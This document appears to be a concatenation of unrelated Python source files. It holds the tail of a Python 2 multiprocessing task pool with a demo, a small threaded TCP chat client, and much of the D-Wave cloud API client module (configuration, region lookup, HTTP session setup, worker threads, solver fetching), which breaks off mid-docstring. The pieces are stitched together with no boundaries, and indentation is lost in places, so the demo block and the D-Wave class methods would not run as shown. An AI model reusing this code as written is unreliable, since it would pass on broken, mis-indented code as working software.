    so that every worker process terminates.
    """
    try:
        for obj in iter:
            if type( obj ) is not tuple:
                raise RuntimeError( '任务迭代器应该返回元组对象[%r]' % obj )
            if len( obj ) != 3:
                raise RuntimeError( '任务迭代器应该返回三元素元组对象[%r]' % obj )
            if not callable( obj[0] ):
                raise RuntimeError( '任务的第一元素应该为可执行对象[%r]' % obj[0] )
            if type( obj[1] ) is not tuple:
                raise RuntimeError( '任务的第二元素应该为tuple[%r]' % obj[1] )
            if type( obj[2] ) is not dict:
                raise RuntimeError( '任务的第三元素应该为dict[%r]' % obj[2] )
            task_queue.put( obj )
    except Exception:
        # BUG FIX: the original computed traceback.format_exc() and threw
        # the string away, silently swallowing producer failures.  Surface
        # the traceback on stderr instead.
        import sys
        sys.stderr.write( traceback.format_exc( ) )
    for i in range( n ):
        task_queue.put( 'STOP' )  # end-of-work sentinel for each worker
def worker(idx, task_queue, done_queue):
    """Consumer process body: execute tasks until the 'STOP' sentinel.

    Each completed task posts ``(idx, result)`` to ``done_queue``; a
    clean shutdown posts 'STOP', while any failure posts
    ``('EXCEPT', traceback_text)``. The process always terminates via
    ``sys.exit(0)``.
    """
    try:
        while True:
            task = task_queue.get()
            if task == 'STOP':
                done_queue.put('STOP')
                break
            func, args, kwargs = task
            done_queue.put((idx, func(idx, *args, **kwargs)))
    except:
        done_queue.put(('EXCEPT', traceback.format_exc()))
    finally:
        import sys
        sys.exit(0)
# for test
# 由于sum函数需要在子进程中执行,因此,必须将其配置为模块级的
import time
def sum(idx, a, b):
    """Demo task (module-level so child processes can pickle it).

    Simulates ~1 second of work in small sleep steps, raises when
    ``a == 5`` to exercise the error path, and returns ``a`` unchanged.
    NOTE: intentionally shadows the builtin ``sum`` in this demo module.
    """
    if a == 5:
        raise RuntimeError('haha')
    acc = 0
    for step in range(10):
        time.sleep(0.1)
        acc += step
    return a
if __name__ == '__main__':
# 测试
def itt():
for i in range( 10 ):
yield ( sum , ( i , i * 10 ) , {} )
def cb( idx , x ):
print 'p' , idx , 'done' , x , time.time()
import time
t = time.time()
print t
mp_start( 5 , itt() , cb )
print time.time() - t |
import socket
import threading


class Client:
    """Minimal TCP chat client.

    Connects to the server, starts a daemon thread that forwards stdin
    lines (prefixed with the user name) to the server, and echoes
    everything received until the connection closes.
    """

    def __init__(self, ip, port):
        # Fixed: the socket and username were class attributes, created
        # (and prompting for input) at class-definition/import time and
        # shared by every instance; they are now created per instance.
        self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.userName = input("Username: ")
        self.server.connect((ip, port))
        iThread = threading.Thread(target=self.sendMsg)
        iThread.daemon = True
        iThread.start()
        # Receive loop: print server messages until the peer disconnects.
        while True:
            data = self.server.recv(2048)
            if not data:
                break
            print(str(data, 'utf-8'))

    def sendMsg(self):
        # Forward each stdin line to the server, tagged with the username.
        while True:
            self.server.send(bytes(f"[{self.userName}] " + input(""), 'utf-8'))


if __name__ == '__main__':
    # Guarded so importing this module no longer opens a connection.
    client = Client(input('Ip: '), int(input('Port: ')))
# Copyright 2017 D-Wave Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
D-Wave API clients handle communications with :term:`solver` resources: problem submittal,
monitoring, samples retrieval, etc.
Examples:
This example creates a client using the local system's default D-Wave Cloud Client
configuration file, which is configured to access a D-Wave 2000Q QPU, submits
a :term:`QUBO` problem (a Boolean NOT gate represented by a penalty model), and
samples 5 times.
>>> from dwave.cloud import Client
>>> Q = {(0, 0): -1, (0, 4): 0, (4, 0): 2, (4, 4): -1}
>>> with Client.from_config() as client: # doctest: +SKIP
... solver = client.get_solver()
... computation = solver.sample_qubo(Q, num_reads=5)
...
>>> for i in range(5): # doctest: +SKIP
... print(computation.samples[i][0], computation.samples[i][4])
...
(1, 0)
(1, 0)
(0, 1)
(0, 1)
(0, 1)
"""
import re
import sys
import time
import json
import copy
import queue
import logging
import inspect
import warnings
import operator
import threading
import base64
import hashlib
import codecs
import concurrent.futures
from itertools import chain, zip_longest
from functools import partial, wraps, lru_cache
from collections import abc, namedtuple, OrderedDict
from concurrent.futures import ThreadPoolExecutor
from typing import Optional, Tuple, Dict
import requests
import urllib3
from dateutil.parser import parse as parse_datetime
from plucky import pluck
from dwave.cloud import api
from dwave.cloud.package_info import __packagename__, __version__
from dwave.cloud.exceptions import * # TODO: fix
from dwave.cloud.computation import Future
from dwave.cloud.config import (
load_config, parse_float, parse_int, parse_boolean, update_config)
from dwave.cloud.solver import Solver, available_solvers
from dwave.cloud.concurrency import PriorityThreadPoolExecutor
from dwave.cloud.upload import ChunkedData
from dwave.cloud.events import dispatches_events
from dwave.cloud.utils import (
TimeoutingHTTPAdapter, BaseUrlSession, user_agent,
datetime_to_timestamp, utcnow, epochnow, cached, retried, is_caused_by)
__all__ = ['Client']
logger = logging.getLogger(__name__)
class Client(object):
"""Base client class for all D-Wave API clients. Used by QPU, software and
hybrid :term:`sampler` classes.
Manages workers and handles thread pools for submitting problems, cancelling
tasks, polling problem status, and retrieving results.
Args:
region (str, optional, default='na-west-1'):
D-Wave Solver API region. To see available regions use
:meth:`.Client.get_regions`.
endpoint (str, optional):
D-Wave Solver API endpoint URL. If undefined, inferred from
``region`` code.
token (str):
Authentication token for the D-Wave API.
solver (dict/str, optional):
Default solver features (or simply solver name) to use in
:meth:`.Client.get_solver`.
Defined via dictionary of solver feature constraints
(see :meth:`.Client.get_solvers`).
For backward compatibility, a solver name, as a string, is also
accepted and converted to ``{"name": <solver name>}``.
proxy (str, optional):
Proxy URL to be used for accessing the D-Wave API.
permissive_ssl (bool, default=False):
Disables SSL verification.
request_timeout (float, default=60):
Connect and read timeout, in seconds, for all requests to the
D-Wave API.
polling_timeout (float, optional):
Problem status polling timeout, in seconds, after which polling is
aborted.
connection_close (bool, default=False):
Force HTTP(S) connection close after each request. Set to ``True``
to prevent intermediate network equipment closing idle connections.
headers (dict/str, optional):
Newline-separated additional HTTP headers to include with each
API request, or a dictionary of (key, value) pairs.
client_cert (str, optional):
Path to client side certificate file.
client_cert_key (str, optional):
Path to client side certificate key file.
poll_backoff_min (float, default=0.05):
Problem status is polled with exponential back-off schedule.
Duration of the first interval (between first and second poll) is
set to ``poll_backoff_min`` seconds.
poll_backoff_max (float, default=60):
Problem status is polled with exponential back-off schedule.
Maximum back-off period is limited to ``poll_backoff_max`` seconds.
http_retry_total (int, default=10):
Total number of retries of failing idempotent HTTP requests to
allow. Takes precedence over other counts.
See ``total`` in :class:`~urllib3.util.retry.Retry` for details.
http_retry_connect (int, default=None):
How many connection-related errors to retry on.
See ``connect`` in :class:`~urllib3.util.retry.Retry` for details.
http_retry_read (int, default=None):
How many times to retry on read errors.
See ``read`` in :class:`~urllib3.util.retry.Retry` for details.
http_retry_redirect (int, default=None):
How many redirects to perform.
See ``redirect`` in :class:`~urllib3.util.retry.Retry` for details.
http_retry_status (int, default=None):
How many times to retry on bad status codes.
See ``status`` in :class:`~urllib3.util.retry.Retry` for details.
http_retry_backoff_factor (float, default=0.01):
A backoff factor to apply between attempts after the second try.
Sleep between retries, in seconds::
{backoff factor} * (2 ** ({number of total retries} - 1))
See ``backoff_factor`` in :class:`~urllib3.util.retry.Retry` for
details.
http_retry_backoff_max (float, default=60):
Maximum backoff time in seconds.
See :attr:`~urllib3.util.retry.Retry.BACKOFF_MAX` for details.
metadata_api_endpoint (str, optional):
D-Wave Metadata API endpoint. Central for all regions, used for
regional SAPI endpoint discovery.
defaults (dict, optional):
Defaults for the client instance that override the class
:attr:`.Client.DEFAULTS`.
Note:
Default values of all constructor arguments listed above are kept in
a class variable :attr:`.Client.DEFAULTS`.
Instance-level defaults can be specified via ``defaults`` argument.
Examples:
This example directly initializes a :class:`.Client`.
Direct initialization uses class constructor arguments, the minimum
being a value for ``token``.
>>> from dwave.cloud import Client
>>> client = Client(token='secret') # doctest: +SKIP
>>> # code that uses client
>>> client.close() # doctest: +SKIP
"""
# The status flags that a problem can have
STATUS_IN_PROGRESS = 'IN_PROGRESS'
STATUS_PENDING = 'PENDING'
STATUS_COMPLETE = 'COMPLETED'
STATUS_FAILED = 'FAILED'
STATUS_CANCELLED = 'CANCELLED'
# Cases when multiple status flags qualify
ANY_STATUS_ONGOING = [STATUS_IN_PROGRESS, STATUS_PENDING]
ANY_STATUS_NO_RESULT = [STATUS_FAILED, STATUS_CANCELLED]
# Default API endpoint
# TODO: remove when refactored to use `dwave.cloud.api`?
DEFAULT_API_ENDPOINT = api.constants.DEFAULT_SOLVER_API_ENDPOINT
DEFAULT_API_REGION = api.constants.DEFAULT_REGION
# Class-level defaults for all constructor and factory arguments
# (instance-level overrides are merged in via the `defaults` init kwarg)
DEFAULTS = {
    # factory only
    'config_file': None,
    'profile': None,
    'client': 'base',
    # constructor (and factory)
    'metadata_api_endpoint': api.constants.DEFAULT_METADATA_API_ENDPOINT,
    'region': DEFAULT_API_REGION,
    # NOTE: should we rename endpoint to solver_api_endpoint for clarity?
    'endpoint': None,  # defined via region, resolved on client init
    'token': None,
    'solver': None,
    'proxy': None,
    'permissive_ssl': False,
    'request_timeout': 60,
    'polling_timeout': None,
    'connection_close': False,
    'headers': None,
    'client_cert': None,
    'client_cert_key': None,
    # poll back-off schedule defaults [sec]
    'poll_backoff_min': 0.05,
    'poll_backoff_max': 60,
    # idempotent http requests retry params
    'http_retry_total': 10,
    'http_retry_connect': None,
    'http_retry_read': None,
    'http_retry_redirect': None,
    'http_retry_status': None,
    'http_retry_backoff_factor': 0.01,
    'http_retry_backoff_max': 60,
}
# Number of problems to include in a submit/status query
_SUBMIT_BATCH_SIZE = 20
_STATUS_QUERY_SIZE = 100
# Number of worker threads for each problem processing task
_SUBMISSION_THREAD_COUNT = 5
_UPLOAD_PROBLEM_THREAD_COUNT = 1
_UPLOAD_PART_THREAD_COUNT = 10
_ENCODE_PROBLEM_THREAD_COUNT = _UPLOAD_PROBLEM_THREAD_COUNT
_CANCEL_THREAD_COUNT = 1
_POLL_THREAD_COUNT = 2
_LOAD_THREAD_COUNT = 5
# Poll grouping time frame; two scheduled polls are grouped if closer than [sec]:
_POLL_GROUP_TIMEFRAME = 2
# Downloaded solver definition cache maxage [sec]
_SOLVERS_CACHE_MAXAGE = 300  # 5 min
# Downloaded region metadata cache maxage [sec]
_REGIONS_CACHE_MAXAGE = 86400  # 1 day
# Multipart upload parameters
_UPLOAD_PART_SIZE_BYTES = 5 * 1024 * 1024
_UPLOAD_PART_RETRIES = 2
_UPLOAD_REQUEST_RETRIES = 2
# Exponential backoff (in seconds) between upload retry attempts.
# NOTE(review): as a class attribute this lambda binds like a method when
# looked up on an instance; it appears intended to be called via the
# class (plain function) -- confirm against call sites.
_UPLOAD_RETRIES_BACKOFF = lambda retry: 2 ** retry
@classmethod
def from_config(cls, config_file=None, profile=None, client=None, **kwargs):
    """Instantiate a client from file/env/kwarg configuration.

    Option precedence (highest first): explicit keyword arguments,
    environment variables, configuration-file values, instance defaults,
    then class :attr:`.Client.DEFAULTS`. File/environment loading is
    described in :func:`~dwave.cloud.config.load_config`.

    Args:
        config_file (str/[str]/None/False/True, default=None):
            Path to configuration file, interpreted by
            :func:`~dwave.cloud.config.load_config`.
        profile (str, default=None):
            Profile name, interpreted by
            :func:`~dwave.cloud.config.load_config`.
        client (str, default=None):
            Client type used for accessing the API: ``qpu`` for
            :class:`dwave.cloud.qpu.Client`, ``sw`` for
            :class:`dwave.cloud.sw.Client`, ``hybrid`` for
            :class:`dwave.cloud.hybrid.Client`, or ``base``.
        **kwargs (dict):
            :class:`.Client` constructor options.

    Returns:
        :class:`~dwave.cloud.client.Client` subclass:
            Appropriate instance of a QPU/software/hybrid client.

    Raises:
        :exc:`~dwave.cloud.exceptions.ConfigFileReadError`:
            Config file specified or detected could not be opened or read.
        :exc:`~dwave.cloud.exceptions.ConfigFileParseError`:
            Config file parse failed.
        :exc:`ValueError`:
            Invalid (non-existing) profile name.
    """
    # Merge configuration from file(s), environment and kwargs.
    config = load_config(config_file=config_file, profile=profile,
                         client=client, **kwargs)
    logger.debug("Config loaded: %r", config)

    # Deferred import avoids a circular dependency at module load time.
    from dwave.cloud.client import qpu, sw, hybrid

    registry = {
        'base': cls,
        'qpu': qpu.Client,
        'sw': sw.Client,
        'hybrid': hybrid.Client,
    }

    kind = config.pop('client', None) or 'base'
    logger.debug("Creating %s.Client() with: %r", kind, config)
    return registry[kind](**config)
def _resolve_region_endpoint(self, *,
                             region: Optional[str] = None,
                             endpoint: Optional[str] = None) -> Tuple[str, str]:
    """Map a configured (region, endpoint) pair to the effective pair.

    An explicit endpoint always wins over the region (keeps the region
    extension backwards compatible). Otherwise the endpoint is looked up
    in the regional metadata; when the Metadata API is unreachable, the
    default global endpoint is used.
    """
    # Explicit endpoint short-circuits any region resolution.
    if endpoint:
        return (region, endpoint)

    if not region:
        return (self.DEFAULT_API_REGION, self.DEFAULT_API_ENDPOINT)

    try:
        available = self.get_regions()
    except (api.exceptions.RequestError, ValueError) as exc:
        logger.warning("Failed to fetch available regions: %r. "
                       "Using the default Solver API endpoint.", exc)
        return (self.DEFAULT_API_REGION, self.DEFAULT_API_ENDPOINT)

    if region not in available:
        raise ValueError(f"Region {region!r} unknown. "
                         f"Try one of {list(available.keys())!r}.")

    return (region, available[region]['endpoint'])
@dispatches_events('client_init')
def __init__(self, endpoint=None, token=None, solver=None, **kwargs):
    """Initialize the client: resolve configuration options, then start
    the worker thread pools (submission, cancellation, polling, result
    loading) and multipart-upload executors.

    See the class docstring for the full list of accepted options.

    Raises:
        ValueError: on a missing endpoint/token, malformed headers or
            solver specification, or a cert key given without a cert.
    """
    # for (reasonable) backwards compatibility, accept only the first few
    # positional args.
    # TODO: deprecate the use of positional args
    if endpoint is not None:
        kwargs.setdefault('endpoint', endpoint)
    if token is not None:
        kwargs.setdefault('token', token)
    if solver is not None:
        kwargs.setdefault('solver', solver)
    logger.debug("Client init called with: %r", kwargs)
    # derive instance-level defaults from class defaults and init defaults
    self.defaults = copy.deepcopy(self.DEFAULTS)
    user_defaults = kwargs.pop('defaults', None)
    if user_defaults is None:
        user_defaults = {}
    update_config(self.defaults, user_defaults)
    # combine instance-level defaults with file/env/kwarg option values
    # note: treat empty string values (e.g. from file/env) as undefined/None
    options = copy.deepcopy(self.defaults)
    update_config(options, kwargs)
    logger.debug("Client options with defaults: %r", options)
    # configure MetadataAPI access -- needed by Client.get_regions()
    self.metadata_api_endpoint = options['metadata_api_endpoint']
    # parse headers as they might be needed by Client.get_regions()
    headers = options['headers']
    if not headers:
        headers_dict = {}
    elif isinstance(headers, abc.Mapping):
        headers_dict = headers
    elif isinstance(headers, str):
        try:
            # valid headers = "Field-1: value-1\nField-2: value-2"
            headers_dict = {key.strip(): val.strip()
                            for key, val in [line.split(':')
                                             for line in headers.strip().split('\n')]}
        except Exception as e:
            # malformed string headers are dropped, not fatal
            logger.debug("Invalid headers: %r", headers)
            headers_dict = {}
    else:
        raise ValueError("HTTP headers expected in a dict, or a string")
    logger.debug("Parsed headers=%r", headers_dict)
    self.headers = headers_dict
    # resolve endpoint using region
    region, endpoint = self._resolve_region_endpoint(
        region=options.get('region'), endpoint=options.get('endpoint'))
    # sanity check
    if not endpoint:
        raise ValueError("API endpoint not defined")
    token = options['token']
    if not token:
        raise ValueError("API token not defined")
    # parse optional client certificate
    client_cert = options['client_cert']
    client_cert_key = options['client_cert_key']
    if client_cert_key is not None:
        if client_cert is not None:
            # requests accepts a (cert, key) tuple for split files
            client_cert = (client_cert, client_cert_key)
        else:
            raise ValueError(
                "Client certificate key given, but the cert is missing")
    # parse solver
    solver = options['solver']
    if not solver:
        solver_def = {}
    elif isinstance(solver, abc.Mapping):
        solver_def = solver
    elif isinstance(solver, str):
        # support features dict encoded as JSON in our config INI file
        # TODO: push this decoding to the config module, once we switch to a
        # richer config format (JSON or YAML)
        try:
            solver_def = json.loads(solver)
        except Exception:
            # unparseable json, assume string name for solver
            # we'll deprecate this eventually, but for now just convert it to
            # features dict (equality constraint on full solver name)
            logger.debug("Invalid solver JSON, assuming string name: %r", solver)
            solver_def = dict(name__eq=solver)
    else:
        raise ValueError("Expecting a features dictionary or a string name for 'solver'")
    logger.debug("Parsed solver=%r", solver_def)
    # Store connection/session parameters
    # TODO: consolidate all options under Client.options or similar
    self.region = region  # for record only
    self.endpoint = endpoint
    self.token = token
    self.default_solver = solver_def
    self.client_cert = client_cert
    self.request_timeout = parse_float(options['request_timeout'])
    self.polling_timeout = parse_float(options['polling_timeout'])
    self.proxy = options['proxy']
    self.permissive_ssl = parse_boolean(options['permissive_ssl'])
    self.connection_close = parse_boolean(options['connection_close'])
    self.poll_backoff_min = parse_float(options['poll_backoff_min'])
    self.poll_backoff_max = parse_float(options['poll_backoff_max'])
    self.http_retry_total = parse_int(options['http_retry_total'])
    self.http_retry_connect = parse_int(options['http_retry_connect'])
    self.http_retry_read = parse_int(options['http_retry_read'])
    self.http_retry_redirect = parse_int(options['http_retry_redirect'])
    self.http_retry_status = parse_int(options['http_retry_status'])
    self.http_retry_backoff_factor = parse_float(options['http_retry_backoff_factor'])
    self.http_retry_backoff_max = parse_float(options['http_retry_backoff_max'])
    opts = (
        'region', 'endpoint', 'token', 'default_solver',
        'client_cert', 'request_timeout', 'polling_timeout',
        'proxy', 'headers', 'permissive_ssl', 'connection_close',
        'poll_backoff_min', 'poll_backoff_max',
        'http_retry_total', 'http_retry_connect', 'http_retry_read',
        'http_retry_redirect', 'http_retry_status',
        'http_retry_backoff_factor', 'http_retry_backoff_max')
    logger.debug(
        "Client initialized with (%s)",
        ", ".join("{}={!r}".format(o, getattr(self, o)) for o in opts))
    # Create session for main thread only
    self.session = self.create_session()
    # Build the problem submission queue, start its workers
    self._submission_queue = queue.Queue()
    self._submission_workers = []
    for _ in range(self._SUBMISSION_THREAD_COUNT):
        worker = threading.Thread(target=self._do_submit_problems)
        worker.daemon = True
        worker.start()
        self._submission_workers.append(worker)
    # Build the cancel problem queue, start its workers
    self._cancel_queue = queue.Queue()
    self._cancel_workers = []
    for _ in range(self._CANCEL_THREAD_COUNT):
        worker = threading.Thread(target=self._do_cancel_problems)
        worker.daemon = True
        worker.start()
        self._cancel_workers.append(worker)
    # Build the problem status polling queue, start its workers
    # (PriorityQueue: polls are scheduled/prioritized by time)
    self._poll_queue = queue.PriorityQueue()
    self._poll_workers = []
    for _ in range(self._POLL_THREAD_COUNT):
        worker = threading.Thread(target=self._do_poll_problems)
        worker.daemon = True
        worker.start()
        self._poll_workers.append(worker)
    # Build the result loading queue, start its workers
    self._load_queue = queue.Queue()
    self._load_workers = []
    for _ in range(self._LOAD_THREAD_COUNT):
        worker = threading.Thread(target=self._do_load_results)
        worker.daemon = True
        worker.start()
        self._load_workers.append(worker)
    # Setup multipart upload executors
    self._upload_problem_executor = \
        ThreadPoolExecutor(self._UPLOAD_PROBLEM_THREAD_COUNT)
    self._upload_part_executor = \
        PriorityThreadPoolExecutor(self._UPLOAD_PART_THREAD_COUNT)
    self._encode_problem_executor = \
        ThreadPoolExecutor(self._ENCODE_PROBLEM_THREAD_COUNT)
# note: @cached_property available only in py38+
@property
@lru_cache(maxsize=None)
def _user_agent(self):
    """User-Agent string for this client instance, as returned by
    :meth:`~dwave.cloud.utils.user_agent`, computed on first access and
    cached for the lifespan of the client.

    Note:
        The only tags that might change are platform tags, as returned by
        ``dwave.common.platform.tags`` entry points, and `platform.platform()`
        (like linux kernel version). Assuming OS/machine won't change during
        client's lifespan, and typical platform tags defined via entry points
        depend on process environments (which rarely change), it's pretty safe
        to always use the per-instance cached user agent.
    """
    # NOTE(review): lru_cache on an instance-bound accessor keys on `self`
    # and keeps every Client instance alive for the cache's lifetime
    # (ruff B019). Presumably acceptable because clients are few and
    # long-lived -- confirm, or switch to functools.cached_property once
    # py38+ is the minimum supported version.
    return user_agent(__packagename__, __version__)
def create_session(self):
    """Build a fresh ``requests`` session configured from this client's
    parameters (base URL, retries, timeouts, headers, certs, proxies).

    Note: since `requests.Session` is NOT thread-safe, every thread should
    create and use an isolated session.
    """
    # Normalize the endpoint so relative request paths resolve under it.
    base_url = self.endpoint
    if not base_url.endswith('/'):
        base_url += '/'

    def make_retry():
        # A subclass is needed only to override the class-level backoff cap.
        class Retry(urllib3.Retry):
            BACKOFF_MAX = self.http_retry_backoff_max

        return Retry(
            total=self.http_retry_total,
            connect=self.http_retry_connect,
            read=self.http_retry_read,
            redirect=self.http_retry_redirect,
            status=self.http_retry_status,
            backoff_factor=self.http_retry_backoff_factor,
            raise_on_redirect=True,
            raise_on_status=True,
            respect_retry_after_header=True)

    session = BaseUrlSession(base_url=base_url)
    for scheme in ('http://', 'https://'):
        session.mount(scheme,
                      TimeoutingHTTPAdapter(timeout=self.request_timeout,
                                            max_retries=make_retry()))

    session.headers.update({'User-Agent': self._user_agent})
    if self.headers:
        session.headers.update(self.headers)
    if self.token:
        session.headers.update({'X-Auth-Token': self.token})
    if self.client_cert:
        session.cert = self.client_cert

    session.proxies = {'http': self.proxy, 'https': self.proxy}
    if self.permissive_ssl:
        session.verify = False
    if self.connection_close:
        session.headers.update({'Connection': 'close'})

    # Debug-log headers
    logger.trace("create_session(session.headers=%r)", session.headers)

    return session
def close(self):
    """Perform a clean shutdown.

    Drains all currently scheduled work, terminates the worker threads,
    and closes the connection pool.

    .. note:: Ensure your code does not submit new work while the connection is closing.
        Where possible, it is recommended you use a context manager (a :code:`with Client.from_config(...) as`
        construct) to ensure your code properly closes all resources.

    Examples:
        This example creates a client (based on an auto-detected configuration file), executes
        some code (represented by a placeholder comment), and then closes the client.

        >>> from dwave.cloud import Client
        >>> client = Client.from_config()    # doctest: +SKIP
        >>> # code that uses client
        >>> client.close()    # doctest: +SKIP
    """
    # Finish all queued work first: it still requires the connection.
    for message, work_queue in (
            ("Joining submission queue", self._submission_queue),
            ("Joining cancel queue", self._cancel_queue),
            ("Joining poll queue", self._poll_queue),
            ("Joining load queue", self._load_queue)):
        logger.debug(message)
        work_queue.join()

    for message, executor in (
            ("Shutting down problem upload executor",
             self._upload_problem_executor),
            ("Shutting down problem part upload executor",
             self._upload_part_executor),
            ("Shutting down problem encoder executor",
             self._encode_problem_executor)):
        logger.debug(message)
        executor.shutdown()

    # Threads can't be 'killed' in Python; enqueue one kill-task (poison
    # pill) per worker so each dies of natural causes.
    for workers, work_queue, sentinel in (
            (self._submission_workers, self._submission_queue, None),
            (self._cancel_workers, self._cancel_queue, None),
            (self._poll_workers, self._poll_queue, (-1, None)),
            (self._load_workers, self._load_queue, None)):
        for _ in workers:
            work_queue.put(sentinel)

    # Wait for every worker thread to terminate.
    for worker in chain(self._submission_workers, self._cancel_workers,
                        self._poll_workers, self._load_workers):
        worker.join()

    # Close the main thread's session
    self.session.close()
def __enter__(self):
    """Let connections be used in with blocks.

    Returns this client instance unchanged; resources are already
    allocated in the constructor.
    """
    return self
def __exit__(self, *args):
    """At the end of a with block perform a clean shutdown of the connection."""
    self.close()
    # Returning False propagates any exception raised inside the block.
    return False
@staticmethod
def is_solver_handled(solver):
    """Determine if the specified solver should be handled by this client.

    Default implementation accepts all solvers (always returns True). Override this
    predicate function with a subclass if you want to specialize your client for a
    particular type of solvers.

    Examples:
        This function accepts only solvers named "My_Solver_*".

        .. code:: python

            @staticmethod
            def is_solver_handled(solver):
                return solver and solver.id.startswith('My_Solver_')
    """
    # The base client imposes no restriction; subclasses filter by type.
    return True
@staticmethod
@cached.ondisk(maxage=_REGIONS_CACHE_MAXAGE)
def _fetch_available_regions(metadata_api_endpoint, **config):
    """Fetch region metadata from the Metadata API (disk-cached)."""
    logger.info("Fetching available regions from the Metadata API at %r",
                metadata_api_endpoint)

    with api.Regions(endpoint=metadata_api_endpoint, **config) as regions_api:
        metadata = regions_api.list_regions()

    logger.debug("Received region metadata: %r", metadata)
    return metadata
def get_regions(self, refresh: bool = False) -> Dict[str, Dict[str, str]]:
    """Retrieve available API regions.

    Args:
        refresh:
            Force cache refresh.

    Returns:
        Mapping of region details (name and endpoint) over region codes.

    Raises:
        ValueError: when the Metadata API is unavailable; the underlying
            request error is attached as the cause.
    """
    try:
        rs = Client._fetch_available_regions(
            metadata_api_endpoint=self.metadata_api_endpoint,
            headers=self.headers,
            refresh_=refresh)
    except api.exceptions.RequestError as exc:
        logger.debug("Metadata API unavailable", exc_info=True)
        # Fixed: chain the cause explicitly so callers inspecting the
        # ValueError see the underlying request error (PEP 3134).
        raise ValueError(
            f"Metadata API unavailable at {self.metadata_api_endpoint!r}") from exc

    logger.info("Using region metadata: %r", rs)
    return {r.code: {"name": r.name, "endpoint": r.endpoint} for r in rs}
@cached(maxage=_SOLVERS_CACHE_MAXAGE)
def _fetch_solvers(self, name=None):
    """Fetch solver definition(s) from SAPI and instantiate solver objects.

    Fetches a single solver when ``name`` is given, otherwise all
    available solvers. Each returned description is wrapped in the first
    class from ``available_solvers`` that accepts it and passes
    :meth:`.is_solver_handled`. Results are cached in-memory
    (``_SOLVERS_CACHE_MAXAGE``).

    Raises:
        SolverNotFoundError: when a named solver does not exist (404).
    """
    if name is not None:
        logger.info("Fetching definition of a solver with name=%r", name)
        url = 'solvers/remote/{}/'.format(name)
    else:
        logger.info("Fetching definitions of all available solvers")
        url = 'solvers/remote/'
    try:
        data = Client._sapi_request(self.session.get, url)
    except SAPIError as exc:
        # translate a 404 on the named-solver endpoint to a richer error
        if name is not None and exc.error_code == 404:
            raise SolverNotFoundError("No solver with name={!r} available".format(name))
        else:
            raise
    if name is not None:
        # single-solver endpoint returns one object; normalize to a list
        data = [data]
    logger.info("Received solver data for %d solver(s).", len(data))
    logger.trace("Solver data received for solver name=%r: %r", name, data)
    solvers = []
    for solver_desc in data:
        for solver_class in available_solvers:
            try:
                logger.debug("Trying to instantiate %r", solver_class.__name__)
                solver = solver_class(self, solver_desc)
                if self.is_solver_handled(solver):
                    solvers.append(solver)
                    logger.info("Adding solver %r", solver)
                    break
                else:
                    logger.debug("Skipping solver %r (not handled by this client)", solver)
            except UnsupportedSolverError as e:
                # try the next solver class for this description
                logger.debug("Skipping solver due to %r", e)
        # propagate all other/decoding errors, like InvalidAPIResponseError, etc.
    return solvers
def retrieve_answer(self, id_):
    """Retrieve a problem by id.

    Args:
        id_ (str):
            As returned by :attr:`Future.id`.

    Returns:
        :class:`Future`
    """
    # Create an unsubmitted Future bound to the remote problem id, then
    # schedule a result load for it.
    result = Future(None, id_)
    self._load(result)
    return result
@dispatches_events('get_solvers')
def get_solvers(self, refresh=False, order_by='avg_load', **filters):
"""Return a filtered list of solvers handled by this client.
Args:
refresh (bool, default=False):
Force refresh of cached list of solvers/properties.
order_by (callable/str/None, default='avg_load'):
Solver sorting key function (or :class:`~dwave.cloud.solver.Solver`
attribute/item dot-separated path). By default, solvers are sorted
by average load. To explicitly not sort the solvers (and use the
API-returned order), set ``order_by=None``.
Signature of the `key` `callable` is::
key :: (Solver s, Ord k) => s -> k
Basic structure of the `key` string path is::
"-"? (attr|item) ( "." (attr|item) )*
For example, to use solver property named ``max_anneal_schedule_points``,
available in ``Solver.properties`` dict, you can either specify a
callable `key`::
key=lambda solver: solver.properties['max_anneal_schedule_points']
or, you can use a short string path based key::
key='properties.max_anneal_schedule_points'
Solver derived properties, available as :class:`Solver` properties
can also be used (e.g. ``num_active_qubits``, ``online``,
``avg_load``, etc).
Ascending sort order is implied, unless the key string path does
not start with ``-``, in which case descending sort is used.
Note: the sort used for ordering solvers by `key` is **stable**,
meaning that if multiple solvers have the same value for the
key, their relative order is preserved, and effectively they are
in the same order as returned by the API.
Note: solvers with ``None`` for key appear last in the list of
solvers. When providing a key callable, ensure all values returned
are of the same type (particularly in Python 3). For solvers with
undefined key value, return ``None``.
**filters:
See `Filtering forms` and `Operators` below.
Solver filters are defined, similarly to Django QuerySet filters, with
keyword arguments of form `<key1>__...__<keyN>[__<operator>]=<value>`.
Each `<operator>` is a predicate (boolean) function that acts on two
arguments: value of feature `<name>` (described with keys path
`<key1.key2...keyN>`) and the required `<value>`.
Feature `<name>` can be:
1) a derived solver property, available as an identically named
:class:`Solver`'s property (`name`, `qpu`, `hybrid`, `software`,
`online`, `num_active_qubits`, `avg_load`)
2) a solver parameter, available in :obj:`Solver.parameters`
3) a solver property, available in :obj:`Solver.properties`
4) a path describing a property in nested dictionaries
Filtering forms are:
* <derived_property>__<operator> (object <value>)
* <derived_property> (bool)
This form ensures the value of solver's property bound to `derived_property`,
after applying `operator` equals the `value`. The default operator is `eq`.
For example::
>>> client.get_solvers(avg_load__gt=0.5)
but also::
>>> client.get_solvers(online=True)
>>> # identical to:
>>> client.get_solvers(online__eq=True)
* <parameter>__<operator> (object <value>)
* <parameter> (bool)
This form ensures that the solver supports `parameter`. General operator form can
be used but usually does not make sense for parameters, since values are human-readable
descriptions. The default operator is `available`.
Example::
>>> client.get_solvers(flux_biases=True)
>>> # identical to:
>>> client.get_solvers(flux_biases__available=True)
* <property>__<operator> (object <value>)
* <property> (bool)
This form ensures the value of the solver's `property`, after applying `operator`
equals the righthand side `value`. The default operator is `eq`.
Note: if a non-existing parameter/property name/key given, the default operator is `eq`.
Operators are:
* `available` (<name>: str, <value>: bool):
Test availability of <name> feature.
* `eq`, `lt`, `lte`, `gt`, `gte` (<name>: str, <value>: any):
Standard relational operators that compare feature <name> value with <value>.
* `regex` (<name>: str, <value>: str):
Test regular expression matching feature value.
* `covers` (<name>: str, <value>: single value or range expressed as 2-tuple/list):
